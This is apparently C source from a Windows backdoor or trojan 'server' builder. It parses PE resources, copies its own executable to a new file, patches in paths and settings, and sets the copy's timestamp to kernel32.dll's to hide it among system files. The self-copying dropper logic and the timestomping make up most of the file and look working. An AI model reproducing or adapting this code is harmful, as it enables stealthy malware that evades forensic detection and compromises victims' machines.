//#define TEST

#include <windows.h>

#include "sm.h"
#include "paths.h"
#include "resource.h"
#include "stdlib.h"
#include "switches.h"

#define PEFHDROFFSET(a) ((LPVOID)((BYTE *)a +  \
    ((PIMAGE_DOS_HEADER)a)->e_lfanew + 4))
#define OPTHDROFFSET(a) ((LPVOID)((BYTE *)a                 + \
    ((PIMAGE_DOS_HEADER)a)->e_lfanew + 4 + \
    sizeof (IMAGE_FILE_HEADER)))
#define SECHDROFFSET(a) ((LPVOID)((BYTE *)a                 + \
    ((PIMAGE_DOS_HEADER)a)->e_lfanew + 4 + \
    sizeof (IMAGE_FILE_HEADER) + 224))



#define IMAGE_BASE    0x400000;


#ifdef TEST

  HANDLE  LogH = NULL;
  char    DbgMsg[ 16384 ];
  int     DbgUsage = 0;

  static void DbgOut()
    {
      DWORD   DbgSz;

      if( LogH != NULL )
        WriteFile( LogH, DbgMsg, lstrlen( DbgMsg ), &DbgSz, NULL );
    }

  static BOOL DbgCreateOutput()
    {
      char  *cp;

      if( 0 != DbgUsage++ ) return TRUE;

      // create log file

      if( GetModuleFileName( NULL, DbgMsg, MAX_PATH ) == 0 ) {
        MessageBox( 0, "GetModuleFileName failed", 0, 0 );
        return FALSE;
      }
      cp = Strrchr( DbgMsg, '.' );
      if( cp != NULL ) *cp = '\0';
      lstrcat( DbgMsg, ".smlog" );
      LogH = CreateFile( DbgMsg, GENERIC_READ | GENERIC_WRITE,
                     0, NULL, OPEN_ALWAYS, 0, NULL );
      if( LogH == INVALID_HANDLE_VALUE ) {
        MessageBox( 0, "CreateFile failed", 0, 0 );
        LogH = NULL;
        return FALSE;
      }
      SetFilePointer( LogH, 0, NULL, FILE_END );
      wsprintf( DbgMsg, "\r\n\r\n***************** log started ************************\r\n\r\n" );
      DbgOut();
      return TRUE;
    }

  static void DbgDestroyOutput()
    {
      if( --DbgUsage == 0 ) { CloseHandle( LogH ); LogH = NULL; }
    }

#endif


static void* GetResourcePtr( BYTE* p, BOOL IsFile,
                             int ResType, int ResId, DWORD* ResourceSize )
  {
    IMAGE_OPTIONAL_HEADER     *oh;
    IMAGE_SECTION_HEADER      *sh;
    IMAGE_RESOURCE_DIRECTORY  *rd;
    IMAGE_RESOURCE_DIRECTORY_ENTRY   *rde;
    IMAGE_RESOURCE_DATA_ENTRY        *rdata;
    DWORD  raddr, rsize, scount, i, rsrcVA;
    BYTE   *rsec, *RetVal;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif


    // get optional header ptr

    oh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p );
    raddr = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].VirtualAddress;
    rsrcVA = raddr;
    rsize = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].Size;

    if( IsFile ) {

      // scanning sections for resources and set correct raddr

      scount = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( p ))->NumberOfSections;
      sh = (IMAGE_SECTION_HEADER*) SECHDROFFSET( p );
      for( i = 0; i < scount; i++, sh++ ) {
        if( raddr >= sh->VirtualAddress &&
            raddr < sh->VirtualAddress + sh->SizeOfRawData ) {
          raddr = sh->PointerToRawData;
#         ifdef TEST
            wsprintf( DbgMsg, "GetResourcePtr: scan - rsrc section at %08X\r\n", sh->PointerToRawData );
            DbgOut();
#         endif
          break;
        }
      }
      if( i >= scount ) raddr = 0;
    }
    if( raddr == 0 || rsize == 0 ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: rsrc section not found\r\n" );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource section addr 0x%X, size 0x%X\r\n", raddr, rsize );
      DbgOut();
#   endif

    rsec = p + raddr;

    // scan root level of resource tree for type

    rd = (IMAGE_RESOURCE_DIRECTORY*) rsec;
    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    for( rsize = 0; rsize < rd->NumberOfIdEntries; rsize++, rde++ ) {
      if( ResType == rde->NameOffset ) break;
    }
    if( rsize >= rd->NumberOfIdEntries ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource type %d not found\r\n", ResType );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

    // rde is now pointer to appropriate type entry

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: directory for resource type %d is located at %08X\r\n", ResType, rde->OffsetToDirectory );
      DbgOut();
#   endif

    if( ! rde->DataIsDirectory ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: invalid directory entry for resource type %d\r\n", ResType );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }
    rd = (IMAGE_RESOURCE_DIRECTORY*) (rsec + rde->OffsetToDirectory);

    // scan second level of resource tree for id

    rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
    for( rsize = 0; rsize < rd->NumberOfIdEntries; rsize++, rde++ ) {
      if( ResId == rde->NameOffset ) break;
    }
    if( rsize >= rd->NumberOfIdEntries ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource id %d not found\r\n", ResId );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

    // rde is now pointer to appropriate id entry

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: directory for resource id %d is located at %08X\r\n", ResId, rde->OffsetToDirectory );
      DbgOut();
#   endif

    if( rde->DataIsDirectory ) {

      // if entry doesn't points to resource data immediately,
      // get resource data from the third level of resource tree

      rd = (IMAGE_RESOURCE_DIRECTORY*) (rsec + rde->OffsetToDirectory);
      rde = (IMAGE_RESOURCE_DIRECTORY_ENTRY*) (rd + 1);
      if( rd->NumberOfIdEntries < 1 ) {
#       ifdef TEST
          wsprintf( DbgMsg, "GetResourcePtr: resource %d %d is empty\r\n", ResType, ResId );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
    }

    // here rde is the pointer to resource data entry

    if( rde->DataIsDirectory ) {
#     ifdef TEST
        wsprintf( DbgMsg, "GetResourcePtr: resource data is expected\r\n" );
        DbgOut();
        DbgDestroyOutput();
#     endif
      return NULL;
    }

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource data entry is located at %08X\r\n", rde->OffsetToDirectory );
      DbgOut();
#   endif
    rdata = (IMAGE_RESOURCE_DATA_ENTRY*) (rsec + rde->OffsetToDirectory);
    if( ResourceSize != NULL ) *ResourceSize = rdata->Size;
#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: resource %d %d is at %08X\r\n", ResType, ResId, rdata->OffsetToData );
      DbgOut();
#   endif

    if( IsFile ) RetVal = rsec + (rdata->OffsetToData - rsrcVA);
    else RetVal = p + rdata->OffsetToData;

#   ifdef TEST
      wsprintf( DbgMsg, "GetResourcePtr: will be returned for %d, %d: %08X, %d (rsrc VA %X)\r\n",
                ResId, ResType, (DWORD) RetVal, *ResourceSize, rsrcVA );
      DbgOut();
      DbgDestroyOutput();
#   endif

    return (void*) RetVal;
  }


static void* GetExecutableImage( DWORD* ImgSize, DWORD ResId )
  {
    void     *p, *Rc;
    BOOL     b;
    DWORD    s;
    char     FileName[ MAX_PATH ];
    HANDLE   Fh;

    if( GetModuleFileName( NULL, FileName, MAX_PATH ) == 0 ) return NULL;
    Fh = CreateFile( FileName, GENERIC_READ,
                     FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) return NULL;
    s = SetFilePointer( Fh, 0, NULL, FILE_END );
    SetFilePointer( Fh, 0, NULL, FILE_BEGIN );
    p = LocalAlloc( LMEM_FIXED, s );
    if( p != NULL ) {
      b = ReadFile( Fh, p, s, ImgSize, NULL );
      if( b != TRUE || *ImgSize != s ) {
        LocalFree( p );
        p = NULL;
      }
      else if( ResId != 0 ) {  // res id 0 - job done, else find resource
        Rc = GetResourcePtr( p, TRUE, RT_FILE, ResId, ImgSize );
        if( Rc == NULL ) {
          LocalFree( p );
          p = NULL;
        }
        else
          RtlMoveMemory( p, Rc, *ImgSize );
      }
    }
    CloseHandle( Fh );
    return p;
  }


static void PatchExeImage( BYTE* ExeImage, char* FNames, BYTE* Cfg, DWORD CfgSz )
  {
    BYTE*  p;
    DWORD  s;

    if( FNames != NULL ) {
      p = GetResourcePtr( ExeImage, TRUE, RT_FILE, IDF_PATHS, &s );
      if( p != NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "PatchExeImage: copying paths\r\n" );
          DbgOut();
#       endif
        lstrcpy( p, FNames );
      }
    }
    if( Cfg != NULL && CfgSz != 0 ) {
      p = GetResourcePtr( ExeImage, TRUE, RT_FILE, IDF_SETTINGS, &s );
      if( p != NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "PatchExeImage: copying settings\r\n" );
          DbgOut();
#       endif
        CopyMemory( p, Cfg, CfgSz );
      }
    }
  }


static void GetKernelTimeStamp( FILETIME* Tm )
  {
    HANDLE     Fh;
    char       FileName[ MAX_PATH ];

    GetKernel32Path( FileName );
    Fh = CreateFile( FileName, GENERIC_READ, FILE_SHARE_READ,
                     NULL, OPEN_EXISTING, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot open %s\r\n", FileName );
        DbgOut();
#     endif
      return;
    }
    if( ! GetFileTime( Fh, NULL, NULL, Tm ) ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot get time of %s\r\n", FileName );
        DbgOut();
#     endif
    }
    CloseHandle( Fh );
  }


/*****************************************************************************
  Morphs itself into new file;
  Fh is the handle of destination file
*/

BOOL SM_MorphServer( HANDLE Fh, DWORD ResId, char* FNames,
                     BYTE* Cfg, DWORD CfgSz )
  {
    void    *ExeImage;
    DWORD   ExeImageSize, s;
    BOOL    Rc;
    FILETIME KernelTime;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif

    GetKernelTimeStamp( &KernelTime );
    Rc = FALSE;
    Srand( GetTickCount() );
    ExeImage = GetExecutableImage( &ExeImageSize, ResId );
    if( ExeImage != NULL ) {

      PatchExeImage( ExeImage, FNames, Cfg, CfgSz );

      if( WriteFile( Fh, ExeImage, ExeImageSize, &s, NULL ) ) {
        SetFileTime( Fh, NULL, NULL, &KernelTime );
        Rc = TRUE;
      }
      LocalFree( ExeImage );
    }

#   ifdef TEST
      DbgDestroyOutput();
#   endif

    return Rc;
  }


/*****************************************************************************
  Get pointer to the resource data (also returns resource size)
  attached to the currently executing image. This means, if
  image was loaded by loader, it does not uses api functions
*/

void* SM_GetResource( int ResType, int ResId, DWORD* ResourceSize )
  {
    BYTE     *p;
    HRSRC    Rh;
    DWORD    s;

#   ifdef TEST
      if( ! DbgCreateOutput() ) return NULL;
#   endif


      // we are operating as regular program so use api functions

#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: using API\r\n" );
        DbgOut();
#     endif

      Rh = FindResource( NULL, MAKEINTRESOURCE( ResId ),
                               MAKEINTRESOURCE( ResType ) );
      if( Rh == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_GetResource: FindResource( NULL, %d, %d ) returned NULL, last error = %d (0x%08X)\r\n",
                    ResId, ResType, GetLastError(), GetLastError() );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
      p = (BYTE*) LoadResource( NULL, Rh );
      if( p == NULL ) {
#       ifdef TEST
          wsprintf( DbgMsg, "SM_GetResource: LoadResource returned NULL, last error = %d (0x%08X)\r\n",
                    GetLastError(), GetLastError() );
          DbgOut();
          DbgDestroyOutput();
#       endif
        return NULL;
      }
      s = SizeofResource( NULL, Rh );
      if( ResourceSize != NULL ) *ResourceSize = s;

#     ifdef TEST
        wsprintf( DbgMsg, "SM_GetResource: will be returned for %d, %d: %08X, %d\r\n",
                  ResId, ResType, (DWORD) p, s );
        DbgOut();
        DbgDestroyOutput();
#     endif

      VirtualProtectEx( GetCurrentProcess(), p, *ResourceSize,
                        PAGE_READWRITE, &s );

      return (void*) p;
  }
